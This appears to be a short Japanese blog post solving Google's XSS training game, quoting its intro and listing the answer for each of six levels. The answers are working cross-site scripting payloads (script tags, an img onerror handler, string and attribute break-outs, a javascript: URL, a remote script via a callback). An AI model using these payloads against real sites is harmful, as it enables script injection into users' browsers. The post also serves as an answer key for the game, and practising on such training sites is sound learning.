xss-gameって?
Welcome, recruit! Cross-site scripting (XSS) bugs are one of the most common and dangerous types of vulnerabilities in Web applications. These nasty buggers can allow your enemies to steal or modify user data in your apps and you must learn to dispatch them, pronto!
At Google, we know very well how important these bugs are. In fact, Google is so serious about finding and fixing XSS issues that we are paying mercenaries up to $7,500 for dangerous XSS bugs discovered in our most sensitive products.
In this training program, you will learn to find and exploit XSS bugs. You'll use this knowledge to confuse and infuriate your adversaries by preventing such bugs from happening in your applications.
There will be cake at the end of the test.
やってみた件
Level 1: Hello, world of XSS
https://xss-game.appspot.com/level1
<h1>xss</h1> https://xss-game.appspot.com/level1/frame?query=<h1>xss</h1>
<script>alert("xss")</script>
https://xss-game.appspot.com/level1/frame?query=<script>alert("xss")</script>
Level 2: Persistence is key
https://xss-game.appspot.com/level2
<img src="xss" onerror=alert("xss")>
Level 3: That sinking feeling...
https://xss-game.appspot.com/level3
'/><script>alert("xss")</script>
https://xss-game.appspot.com/level3/frame#1'/><script>alert("xss")</script>
Level 4: Context matters
https://xss-game.appspot.com/level4
3');alert("xss")('
Level 5: Breaking protocol
https://xss-game.appspot.com/level5
javascript:alert("xss")
Level 6: Follow the 🐇
//google.com/jsapi?callback=alert https://xss-game.appspot.com/level6/frame#//google.com/jsapi?callback=alert
done
